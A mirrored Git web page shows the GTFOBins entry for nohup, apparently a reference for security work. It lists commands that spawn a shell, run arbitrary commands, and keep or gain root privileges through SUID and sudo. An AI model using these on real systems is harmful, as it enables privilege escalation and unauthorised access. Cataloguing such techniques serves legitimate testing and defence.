This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-10 09:21:34 +01:00
Code
Issues
f4ec254e8c
GTFOBins.github.io
/
_gtfobins
/
nohup.md
Nick Blekherman
b43f418ddb
Add ./ to SUID category in nohup.mp
2021-01-18 09:36:35 +02:00
336 B
Raw
Blame
History
functions
shell
command
suid
sudo
code
nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
code
COMMAND='/usr/bin/id' nohup "$COMMAND" cat nohup.out
code
./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
code
sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"